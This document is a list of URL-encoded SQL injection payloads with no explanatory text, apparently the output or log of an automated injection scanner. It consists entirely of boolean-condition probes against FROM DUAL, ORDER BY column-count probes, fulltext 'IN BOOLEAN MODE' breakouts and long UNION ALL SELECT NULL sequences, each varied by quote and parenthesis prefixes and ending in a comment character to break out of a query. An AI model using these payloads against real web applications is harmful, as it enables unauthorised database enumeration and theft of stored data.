-7689%27%7C%7C%28SELECT%20%27HCqa%27%20FROM%20DUAL%20WHERE%201989%3D1989%20UNION%20ALL%20SELECT%201989%2C1989%2C1989%2C1989%2C1989%2C1989%2C1989%2C1989%23 -3639%27%7C%7C%28SELECT%20%27aekk%27%20FROM%20DUAL%20WHERE%204012%3D4012%20UNION%20ALL%20SELECT%204012%2C4012%2C4012%2C4012%2C4012%2C4012%2C4012%2C4012%2C4012%23 -7331%27%7C%7C%28SELECT%20%27sVil%27%20FROM%20DUAL%20WHERE%209778%3D9778%20UNION%20ALL%20SELECT%209778%2C9778%2C9778%2C9778%2C9778%2C9778%2C9778%2C9778%2C9778%2C9778%23 -2667%27%7C%7C%28SELECT%20%27gJGV%27%20WHERE%201319%3D1319%20ORDER%20BY%201%23 -8772%27%7C%7C%28SELECT%20%27wrwg%27%20WHERE%204673%3D4673%20ORDER%20BY%204606%23 -3718%27%7C%7C%28SELECT%20%27WPxx%27%20WHERE%207307%3D7307%20UNION%20ALL%20SELECT%207307%23 -5725%27%7C%7C%28SELECT%20%27zvzw%27%20WHERE%201924%3D1924%20UNION%20ALL%20SELECT%201924%2C1924%23 -3301%27%7C%7C%28SELECT%20%27AUgD%27%20WHERE%204557%3D4557%20UNION%20ALL%20SELECT%204557%2C4557%2C4557%23 -7451%27%7C%7C%28SELECT%20%27PxtL%27%20WHERE%206984%3D6984%20UNION%20ALL%20SELECT%206984%2C6984%2C6984%2C6984%23 -5639%27%7C%7C%28SELECT%20%27dGSZ%27%20WHERE%205938%3D5938%20UNION%20ALL%20SELECT%205938%2C5938%2C5938%2C5938%2C5938%23 -2643%27%7C%7C%28SELECT%20%27CnXu%27%20WHERE%203959%3D3959%20UNION%20ALL%20SELECT%203959%2C3959%2C3959%2C3959%2C3959%2C3959%23 -3663%27%7C%7C%28SELECT%20%27nHkB%27%20WHERE%208301%3D8301%20UNION%20ALL%20SELECT%208301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%23 -3139%27%7C%7C%28SELECT%20%27Uncv%27%20WHERE%201621%3D1621%20UNION%20ALL%20SELECT%201621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%23 -2909%27%7C%7C%28SELECT%20%27ZyOb%27%20WHERE%208126%3D8126%20UNION%20ALL%20SELECT%208126%2C8126%2C8126%2C8126%2C8126%2C8126%2C8126%2C8126%2C8126%23 -3664%27%7C%7C%28SELECT%20%27pyLp%27%20WHERE%207444%3D7444%20UNION%20ALL%20SELECT%207444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%23 -8032%27%2B%28SELECT%20ubfY%20WHERE%203464%3D3464%20ORDER%20BY%201%23 -6684%27%2B%28SELECT%20WVln%20WHERE%201597%3D1597%20ORDER%20BY%207824%23 -7140%27%2B%28SELECT%20qvmU%20WHERE%207839%3D7839%20UNION%20ALL%20SELECT%207839%23 -7616%27%2B%28SELECT%20UbZp%20WHERE%209031%3D9031%20UNION%20ALL%20SELECT%209031%2C9031%23 -2631%27%2B%28SELECT%20YztF%20WHERE%202683%3D2683%20UNION%20ALL%20SELECT%202683%2C2683%2C2683%23 -4500%27%2B%28SELECT%20XbLG%20WHERE%202723%3D2723%20UNION%20ALL%20SELECT%202723%2C2723%2C2723%2C2723%23 -3823%27%2B%28SELECT%20tKEH%20WHERE%205405%3D5405%20UNION%20ALL%20SELECT%205405%2C5405%2C5405%2C5405%2C5405%23 -8763%27%2B%28SELECT%20aPkX%20WHERE%205953%3D5953%20UNION%20ALL%20SELECT%205953%2C5953%2C5953%2C5953%2C5953%2C5953%23 -4903%27%2B%28SELECT%20rfxr%20WHERE%201231%3D1231%20UNION%20ALL%20SELECT%201231%2C1231%2C1231%2C1231%2C1231%2C1231%2C1231%23 -3981%27%2B%28SELECT%20fPLb%20WHERE%208134%3D8134%20UNION%20ALL%20SELECT%208134%2C8134%2C8134%2C8134%2C8134%2C8134%2C8134%2C8134%23 -3223%27%2B%28SELECT%20qLrI%20WHERE%209252%3D9252%20UNION%20ALL%20SELECT%209252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%23 -2142%27%2B%28SELECT%20qfZJ%20WHERE%203605%3D3605%20UNION%20ALL%20SELECT%203605%2C3605%2C3605%2C3605%2C3605%2C3605%2C3605%2C3605%2C3605%2C3605%23 -4932%27%2B%28SELECT%20%27CyFc%27%20WHERE%203350%3D3350%20ORDER%20BY%201%23 -8273%27%2B%28SELECT%20%27fJsV%27%20WHERE%202331%3D2331%20ORDER%20BY%203645%23 -3434%27%2B%28SELECT%20%27hdqD%27%20WHERE%206802%3D6802%20UNION%20ALL%20SELECT%206802%23 -8916%27%2B%28SELECT%20%27LCQM%27%20WHERE%202258%3D2258%20UNION%20ALL%20SELECT%202258%2C2258%23 -2937%27%2B%28SELECT%20%27pKqC%27%20WHERE%201781%3D1781%20UNION%20ALL%20SELECT%201781%2C1781%2C1781%23 -1737%27%2B%28SELECT%20%27cwBX%27%20WHERE%202374%3D2374%20UNION%20ALL%20SELECT%202374%2C2374%2C2374%2C2374%23 -5249%27%2B%28SELECT%20%27ZLNK%27%20WHERE%207100%3D7100%20UNION%20ALL%20SELECT%207100%2C7100%2C7100%2C7100%2C7100%23 -5999%27%2B%28SELECT%20%27MJSp%27%20WHERE%208304%3D8304%20UNION%20ALL%20SELECT%208304%2C8304%2C8304%2C8304%2C8304%2C8304%23 -8981%27%2B%28SELECT%20%27pXqz%27%20WHERE%209108%3D9108%20UNION%20ALL%20SELECT%209108%2C9108%2C9108%2C9108%2C9108%2C9108%2C9108%23 -6649%27%2B%28SELECT%20%27kcfh%27%20WHERE%202139%3D2139%20UNION%20ALL%20SELECT%202139%2C2139%2C2139%2C2139%2C2139%2C2139%2C2139%2C2139%23 -1611%27%2B%28SELECT%20%27QBzs%27%20WHERE%201068%3D1068%20UNION%20ALL%20SELECT%201068%2C1068%2C1068%2C1068%2C1068%2C1068%2C1068%2C1068%2C1068%23 -7391%27%2B%28SELECT%20%27tTvn%27%20WHERE%204858%3D4858%20UNION%20ALL%20SELECT%204858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%23 -9314%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%201%23 -2472%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%203682%23 -9978%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203440%23 -9512%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205664%2C5664%23 -2324%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206938%2C6938%2C6938%23 -4199%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201064%2C1064%2C1064%2C1064%23 -8992%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207365%2C7365%2C7365%2C7365%2C7365%23 -8969%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205114%2C5114%2C5114%2C5114%2C5114%2C5114%23 -7141%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202414%2C2414%2C2414%2C2414%2C2414%2C2414%2C2414%23 -4638%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202097%2C2097%2C2097%2C2097%2C2097%2C2097%2C2097%2C2097%23 -7856%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201494%2C1494%2C1494%2C1494%2C1494%2C1494%2C1494%2C1494%2C1494%23 -2834%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203587%2C3587%2C3587%2C3587%2C3587%2C3587%2C3587%2C3587%2C3587%2C3587%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 